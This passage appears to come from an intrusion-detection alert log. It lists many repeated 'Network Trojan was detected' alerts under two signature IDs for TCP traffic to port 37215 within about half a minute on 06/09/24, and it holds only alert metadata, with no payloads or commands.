          SID:2829579
          Source Port:45566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869398
          SID:2835222
          Source Port:35438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719621
          SID:2835222
          Source Port:55128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166791
          SID:2835222
          Source Port:53990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944396
          SID:2835222
          Source Port:48372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080265
          SID:2835222
          Source Port:50724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167608
          SID:2835222
          Source Port:37930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296500
          SID:2835222
          Source Port:50058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249363
          SID:2829579
          Source Port:33396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.100063
          SID:2835222
          Source Port:39332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643375
          SID:2829579
          Source Port:35802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571546
          SID:2835222
          Source Port:53056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653034
          SID:2829579
          Source Port:40030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298394
          SID:2835222
          Source Port:50394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466067
          SID:2835222
          Source Port:60626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715698
          SID:2829579
          Source Port:55560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539742
          SID:2829579
          Source Port:60116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082278
          SID:2829579
          Source Port:49372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163858
          SID:2829579
          Source Port:36154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719813
          SID:2829579
          Source Port:49484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998629
          SID:2829579
          Source Port:36384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946942
          SID:2835222
          Source Port:38200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.661025
          SID:2835222
          Source Port:43416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988958
          SID:2835222
          Source Port:44540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224125
          SID:2829579
          Source Port:39184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267453
          SID:2829579
          Source Port:40656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286566
          SID:2829579
          Source Port:58632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223402
          SID:2829579
          Source Port:37340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946091
          SID:2835222
          Source Port:49872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918022
          SID:2835222
          Source Port:57414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418910
          SID:2829579
          Source Port:35680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288945
          SID:2829579
          Source Port:60204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986725
          SID:2829579
          Source Port:55060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242663
          SID:2835222
          Source Port:40710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206745
          SID:2829579
          Source Port:51738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466249
          SID:2835222
          Source Port:46766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947212
          SID:2835222
          Source Port:50638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538162
          SID:2829579
          Source Port:44996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.079855
          SID:2835222
          Source Port:34014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714998
          SID:2829579
          Source Port:40056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077778
          SID:2835222
          Source Port:50826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245063
          SID:2835222
          Source Port:33130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644782
          SID:2835222
          Source Port:40196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718859
          SID:2835222
          Source Port:46186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075774
          SID:2829579
          Source Port:57408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468699
          SID:2829579
          Source Port:50428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987124
          SID:2835222
          Source Port:40362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412216
          SID:2829579
          Source Port:38642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558050
          SID:2829579
          Source Port:56562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945904
          SID:2835222
          Source Port:38158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922008
          SID:2835222
          Source Port:58294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564828
          SID:2835222
          Source Port:40920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079291
          SID:2835222
          Source Port:57402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605665
          SID:2829579
          Source Port:50230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716960
          SID:2835222
          Source Port:38334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286844
          SID:2829579
          Source Port:47620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.949021
          SID:2835222
          Source Port:57382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034106
          SID:2835222
          Source Port:34758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082926
          SID:2829579
          Source Port:42650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991773
          SID:2835222
          Source Port:54462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292290
          SID:2829579
          Source Port:32948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412302
          SID:2829579
          Source Port:34930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223500
          SID:2835222
          Source Port:53308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205252
          SID:2829579
          Source Port:46736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029893
          SID:2835222
          Source Port:45588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034804
          SID:2829579
          Source Port:44050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.282229
          SID:2835222
          Source Port:37398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103927
          SID:2835222
          Source Port:50272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987184
          SID:2829579
          Source Port:52798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721287
          SID:2829579
          Source Port:45492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.039603
          SID:2835222
          Source Port:55492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931312
          SID:2835222
          Source Port:51904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643602
          SID:2829579
          Source Port:53170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.682157
          SID:2829579
          Source Port:51558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162641
          SID:2829579
          Source Port:54484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282166
          SID:2829579
          Source Port:52646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718448
          SID:2835222
          Source Port:36800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169380
          SID:2835222
          Source Port:50416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.270028
          SID:2829579
          Source Port:40538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538573
          SID:2835222
          Source Port:55966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926057
          SID:2835222
          Source Port:33472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306576
          SID:2829579
          Source Port:33588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923825
          SID:2829579
          Source Port:34862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165540
          SID:2829579
          Source Port:51496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252971
          SID:2829579
          Source Port:33020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928366
          SID:2829579
          Source Port:58228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944698
          SID:2829579
          Source Port:55306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569357
          SID:2829579
          Source Port:58376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246104
          SID:2829579
          Source Port:35284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537873
          SID:2829579
          Source Port:45506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944300
          SID:2829579
          Source Port:38362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207013
          SID:2835222
          Source Port:57760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035377
          SID:2829579
          Source Port:36592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945774
          SID:2835222
          Source Port:39470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719812
          SID:2829579
          Source Port:58870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916026
          SID:2829579
          Source Port:54958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289201
          SID:2829579
          Source Port:48344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077073
          SID:2835222
          Source Port:36588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.167028
          SID:2835222
          Source Port:50754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282070
          SID:2829579
          Source Port:47364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102446
          SID:2829579
          Source Port:53456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014340
          SID:2829579
          Source Port:43514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930277
          SID:2829579
          Source Port:46932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919235
          SID:2829579
          Source Port:49912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990708
          SID:2829579
          Source Port:37198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008427
          SID:2835222
          Source Port:51612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719434
          SID:2829579
          Source Port:42764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285726
          SID:2829579
          Source Port:36026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716131
          SID:2835222
          Source Port:45058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289000
          SID:2835222
          Source Port:60880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644637
          SID:2835222
          Source Port:48654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267478
          SID:2835222
          Source Port:52824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.995814
          SID:2835222
          Source Port:44576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987848
          SID:2835222
          Source Port:34262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720836
          SID:2829579
          Source Port:35274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302428
          SID:2829579
          Source Port:44212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247326
          SID:2829579
          Source Port:47028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915051
          SID:2829579
          Source Port:59250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476814
          SID:2829579
          Source Port:58018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948821
          SID:2829579
          Source Port:48424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905278
          SID:2829579
          Source Port:58126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820212
          SID:2829579
          Source Port:48530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863862
          SID:2835222
          Source Port:43702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645915
          SID:2835222
          Source Port:54512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.087714
          SID:2835222
          Source Port:35298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469450
          SID:2829579
          Source Port:42132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924318
          SID:2829579
          Source Port:52268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986499
          SID:2829579
          Source Port:59938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166710
          SID:2835222
          Source Port:55982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275977
          SID:2829579
          Source Port:36236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.955136
          SID:2835222
          Source Port:50926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568907
          SID:2829579
          Source Port:51698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289598
          SID:2829579
          Source Port:55822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103266
          SID:2835222
          Source Port:43702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163160
          SID:2829579
          Source Port:42488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713527
          SID:2835222
          Source Port:41238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119759
          SID:2829579
          Source Port:56478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.556749
          SID:2829579
          Source Port:49922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919540
          SID:2835222
          Source Port:52232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.089611
          SID:2835222
          Source Port:39522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947760
          SID:2835222
          Source Port:41720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922166
          SID:2835222
          Source Port:54226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224102
          SID:2829579
          Source Port:41068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396754
          SID:2829579
          Source Port:32904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415434
          SID:2835222
          Source Port:41270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165405
          SID:2835222
          Source Port:32976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987384
          SID:2829579
          Source Port:46954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922066
          SID:2829579
          Source Port:39586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719867
          SID:2829579
          Source Port:48160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539552
          SID:2835222
          Source Port:47096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564203
          SID:2835222
          Source Port:53082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283225
          SID:2835222
          Source Port:55232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225475
          SID:2829579
          Source Port:48820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.553806
          SID:2835222
          Source Port:54286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413217
          SID:2829579
          Source Port:59230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396255
          SID:2829579
          Source Port:38564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.900326
          SID:2829579
          Source Port:39860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267443
          SID:2835222
          Source Port:33112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.271157
          SID:2829579
          Source Port:43972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.952606
          SID:2835222
          Source Port:44950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251412
          SID:2829579
          Source Port:52946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161369
          SID:2835222
          Source Port:36122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.951960
          SID:2835222
          Source Port:51684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916437
          SID:2829579
          Source Port:45722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158005
          SID:2829579
          Source Port:43614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476131
          SID:2835222
          Source Port:36436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.992259
          SID:2835222
          Source Port:54848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225029
          SID:2829579
          Source Port:44526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415509
          SID:2835222
          Source Port:34198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249473
          SID:2829579
          Source Port:38856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.270088
          SID:2835222
          Source Port:51142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103206
          SID:2835222
          Source Port:59482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538486
          SID:2835222
          Source Port:59188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993666
          SID:2829579
          Source Port:54792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.983669
          SID:2835222
          Source Port:45586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033872
          SID:2829579
          Source Port:59682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029677
          SID:2835222
          Source Port:59712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205767
          SID:2829579
          Source Port:57278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539063
          SID:2835222
          Source Port:51652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226624
          SID:2829579
          Source Port:50386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538163
          SID:2829579
          Source Port:59516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606941
          SID:2835222
          Source Port:40504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250493
          SID:2829579
          Source Port:38938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.693025
          SID:2829579
          Source Port:57022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566189
          SID:2829579
          Source Port:54690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226073
          SID:2835222
          Source Port:50152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559633
          SID:2835222
          Source Port:41162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719476
          SID:2829579
          Source Port:34950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292939
          SID:2829579
          Source Port:40150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469629
          SID:2835222
          Source Port:39458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929785
          SID:2835222
          Source Port:44512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287914
          SID:2835222
          Source Port:34078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288159
          SID:2835222
          Source Port:58104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820232
          SID:2835222
          Source Port:41476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902198
          SID:2835222
          Source Port:40454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471492
          SID:2829579
          Source Port:57800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917977
          SID:2829579
          Source Port:57878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895718
          SID:2835222
          Source Port:49408
          Destination Port:37215
